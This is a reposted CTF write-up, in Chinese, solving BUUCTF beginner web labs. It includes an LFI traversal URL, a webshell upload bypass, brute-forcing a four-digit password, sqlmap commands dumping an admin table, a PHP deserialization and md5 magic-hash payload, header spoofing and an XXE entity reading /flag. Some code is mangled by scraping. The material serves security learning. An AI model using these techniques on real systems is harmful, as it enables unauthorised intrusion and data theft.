我的编程空间,编程开发者的网络收藏夹
学习永远不晚

【网络安全CTF】BUUCTF(Basic篇)

短信预约 -IT技能 免费直播动态提醒
省份

北京

  • 北京
  • 上海
  • 天津
  • 重庆
  • 河北
  • 山东
  • 辽宁
  • 黑龙江
  • 吉林
  • 甘肃
  • 青海
  • 河南
  • 江苏
  • 湖北
  • 湖南
  • 江西
  • 浙江
  • 广东
  • 云南
  • 福建
  • 海南
  • 山西
  • 四川
  • 陕西
  • 贵州
  • 安徽
  • 广西
  • 内蒙
  • 西藏
  • 新疆
  • 宁夏
  • 兵团
手机号立即预约

请填写图片验证码后获取短信验证码

看不清楚,换张图片

免费获取短信验证码

【网络安全CTF】BUUCTF(Basic篇)

Linux Labs

解题思路:已给用户名密码,直接用ssh工具连接即可获取flag
在这里插入图片描述在这里插入图片描述
查找flag在跟下
在这里插入图片描述
提交完成。

BUU LFI COURSE 1

在这里插入图片描述
访问链接:为php代码审计题,看题目要求构造GET请求读取文件
http://9a7d4988-99f9-4c29-88d8-600e19887723.node4.buuoj.cn:81/?file=/…/…/flag
在这里插入图片描述
在这里插入图片描述

Upload-Labs-Linux 靶场

在这里插入图片描述
访问链接:为uploab-labs靶场,这个共有20关过一关可获取flag。
在这里插入图片描述
选择第一关:查看代码发现为前端js限制文件类型,这种直接使用抓包进行绕过
在这里插入图片描述
准备shell木马文件:

修改扩展名为.jpg 或.png或.gif
文件上传抓包:
在这里插入图片描述
修改扩展名为php
在这里插入图片描述
文件存放位置:
在这里插入图片描述
在这里插入图片描述
使用蚁剑链接
在这里插入图片描述
在这里插入图片描述
成功获取flag,其他关卡不在说明,通关思路都为上传绕过。

BUU BRUTE 1

在这里插入图片描述
一个登陆框:
在这里插入图片描述
随便输入账号密码:
在这里插入图片描述
提示用户名错误:
在这里插入图片描述
试试常用用户名admin、root、administrator等
发现使用admin作为用户名,提示密码为四位数字。
在这里插入图片描述
使用暴力破解:
使用字典生成器生成4位数密码:
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
密码破译为:6490

在这里插入图片描述
在这里插入图片描述

BUU SQL COURSE 1

在这里插入图片描述
明显的sql注入
在这里插入图片描述
使用sqlmap直接爆数据库
在这里插入图片描述加参数 -dbs
sqlmap.exe -u “http://b36e1058-d0a1-450b-b960-cf2f1d4a79bd.node4.buuoj.cn:81/backend/content_detail.php?id=1” -dbs
在这里插入图片描述
其中news和test比较显眼,查news数据库
sqlmap.exe -u “http://b36e1058-d0a1-450b-b960-cf2f1d4a79bd.node4.buuoj.cn:81/backend/content_detail.php?id=1” -D news --tables
在这里插入图片描述
查看admin表内字段

sqlmap.exe -u “http://b36e1058-d0a1-450b-b960-cf2f1d4a79bd.node4.buuoj.cn:81/backend/content_detail.php?id=1” -D news -T admin --columns
在这里插入图片描述
sqlmap.exe -u “http://b36e1058-d0a1-450b-b960-cf2f1d4a79bd.node4.buuoj.cn:81/backend/content_detail.php?id=1” -D news -T admin -C id,password,username --dump
在这里插入图片描述
admin 加密码登陆注意这里不是md5加密,开始看错了,解半天没解出发现是明文存储的,无语。
在这里插入图片描述

BUU CODE REVIEW 1

在这里插入图片描述
代码审计:

在这里插入图片描述
代码片段:

correct = base64_encode(uniqid());  //uniqid() 函数基于以微秒计的当前时间,生成一个唯一的 ID,base64_encode为转换为bash64编码           if($this->correct === $this->input) {  /判断两个属性是否全等                   echo file_get_contents("/flag");  //若全等,则打印根目录下的flag           }       } catch (Exception $e) {       }   }}if($_GET['pleaseget'] === '1') { //判断pleaseget==='1'&&pleasepost==='2'&&md1!=md52&&md5(md51)==md5(md52)    if($_POST['pleasepost'] === '2') {        if(md5($_POST['md51']) == md5($_POST['md52']) && $_POST['md51'] != $_POST['md52']) {            unserialize($_POST['obj']);        }    }}

第二段代码get参数简单为

http://IP/?pleaseget=1

第一段代码使用空数组绕过,给POST参数

pleasepost=2&md51=QNKCDZO&md52=s155964671a&obj=O:3:"BUU":2:{s:7:"correct";s:0:"";s:5:"input";R:2;}

此题详解可以看:https://blog.csdn.net/weixin_43965597/article/details/126381171
在这里插入图片描述

sqli-labs

参考之前写的:https://blog.csdn.net/qq_39583774/article/details/120722112?spm=1001.2014.3001.5501

BUU UPLOAD COURSE 1

在这里插入图片描述
上传实验
这里我传的docx的文件,可以看到变成了jpg的格式
在这里插入图片描述
并看不到文件内容
在这里插入图片描述
使用抓包工具修改包:
在这里插入图片描述
尝试连接:

在这里插入图片描述

测试连接失败:
在这里插入图片描述
使用其他方式,发现这里不对,上传一个phpinfo发现能够执行,但是执行的jpg格式。
在这里插入图片描述

既然能够执行php那我们直接写一个php打印flag即可。

$output
";?>

上传直接访问即可拿到flag
在这里插入图片描述

BUU BURP COURSE 1

在这里插入图片描述

在这里插入图片描述
打开后直接显示只能本地访问,本地ip的由X-Forwarded-For和X-Real-IP进行构建
这里是使用的X-Real-IP构建的
在这里插入图片描述

在这里插入图片描述

BUU XXE COURSE 1

XXE漏洞是外部实体注入攻击
在这里插入图片描述

在这里插入图片描述
在这里插入图片描述
用burp抓包,这里是个xml的提交
在这里插入图片描述

我们在这定义了一个实体 xxe,它将指向/flag 文件,然后我们在 XML 数据中使用 &xxe; 引用这个实体,这样攻击者就可以将该文件中的内容读取到 HTTP 响应中。

]>  &xxe;  test

在这里插入图片描述

来源地址:https://blog.csdn.net/qq_39583774/article/details/127200071

免责声明:

① 本站未注明“稿件来源”的信息均来自网络整理。其文字、图片和音视频稿件的所属权归原作者所有。本站收集整理出于非商业性的教育和科研之目的,并不意味着本站赞同其观点或证实其内容的真实性。仅作为临时的测试数据,供内部测试之用。本站并未授权任何人以任何方式主动获取本站任何信息。

② 本站未注明“稿件来源”的临时测试数据将在测试完成后最终做删除处理。有问题或投稿请发送至: 邮箱/279061341@qq.com QQ/279061341

【网络安全CTF】BUUCTF(Basic篇)

下载Word文档到电脑,方便收藏和打印~

下载Word文档

猜你喜欢

2020年网络安全事件回顾(国际篇)

本文我们特别整理了2020年全球范围内比较突出的18起网络安全事件,一起来按时间顺序回顾一下。

2020年网络安全事件回顾(国内篇)

本文特别整理了2020年我国十起典型的网络安全事件,一起来回顾下。

《网络安全法》五周年:网络安全为人民 网络安全靠人民

2022年6月1日,《中华人民共和国网络安全法》(以下简称《网络安全法》)正式实施五周年。

欧盟网络安全威胁之社会工程(上篇)

本文主要从社会工程趋势、社会工程攻击实施设备和社会工程攻击实例三个方面对社会工程进行简要介绍,期望可以对想要初步了解社会工程的读者有所帮助。下篇将对社会工程中用到的攻击方法进行介绍。

网络安全攻防:无线网络安全之WPA

WPA针对WEP存在的缺陷,如 IV 过短、密钥管理过于简单、对消息完整性没有有效的保护等问题,通过软件升级的方式来提高无线网络的安全性。

网络安全知识之什么是网络安全?

网络安全的概念,有很多不同的定义。在一些场合中,我们最多的考虑的还是网络的技术安全,但是技术延伸出来的安全又会涉及到社会安全、文化安全、国家安全等等。

网络安全攻防:无线网络安全之WEP

单从英文名字上看,WEP 似乎是一个针对有线网络的安全加密协议,其实并非如此。WEP标准在无线网络出现的早期就已创建,它是无线局域网WLAN的必要的安全防护层。

网络安全知识之保护家庭网络安全

家庭网络安全是指保护将设备(例如路由器、计算机、智能手机和支持 Wi-Fi 的婴儿监视器和相机)相互连接并连接到家中互联网的网络。

编程热搜

  • Python 学习之路 - Python
    一、安装Python34Windows在Python官网(https://www.python.org/downloads/)下载安装包并安装。Python的默认安装路径是:C:\Python34配置环境变量:【右键计算机】--》【属性】-
    Python 学习之路 - Python
  • chatgpt的中文全称是什么
    chatgpt的中文全称是生成型预训练变换模型。ChatGPT是什么ChatGPT是美国人工智能研究实验室OpenAI开发的一种全新聊天机器人模型,它能够通过学习和理解人类的语言来进行对话,还能根据聊天的上下文进行互动,并协助人类完成一系列
    chatgpt的中文全称是什么
  • C/C++中extern函数使用详解
  • C/C++可变参数的使用
    可变参数的使用方法远远不止以下几种,不过在C,C++中使用可变参数时要小心,在使用printf()等函数时传入的参数个数一定不能比前面的格式化字符串中的’%’符号个数少,否则会产生访问越界,运气不好的话还会导致程序崩溃
    C/C++可变参数的使用
  • css样式文件该放在哪里
  • php中数组下标必须是连续的吗
  • Python 3 教程
    Python 3 教程 Python 的 3.0 版本,常被称为 Python 3000,或简称 Py3k。相对于 Python 的早期版本,这是一个较大的升级。为了不带入过多的累赘,Python 3.0 在设计的时候没有考虑向下兼容。 Python
    Python 3 教程
  • Python pip包管理
    一、前言    在Python中, 安装第三方模块是通过 setuptools 这个工具完成的。 Python有两个封装了 setuptools的包管理工具: easy_install  和  pip , 目前官方推荐使用 pip。    
    Python pip包管理
  • ubuntu如何重新编译内核
  • 改善Java代码之慎用java动态编译

目录